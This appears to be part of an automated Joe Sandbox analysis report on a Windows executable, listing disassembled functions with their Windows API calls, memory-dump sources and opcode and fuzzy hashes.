                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                          Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                          • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                          • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                          • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                          Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                          Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                          Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                          • __itow.LIBCMT ref: 004699CD
                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                          • __itow.LIBCMT ref: 00469A97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                          Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
                                                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                          Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                          Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                          Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                          Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                          Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 004503C8
                                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Proc$Parent
                                                                          • String ID:
                                                                          • API String ID: 2351499541-0
                                                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                          Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                          • String ID:
                                                                          • API String ID: 1795658109-0
                                                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                          Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                          Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 2886238975-0
                                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                          Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
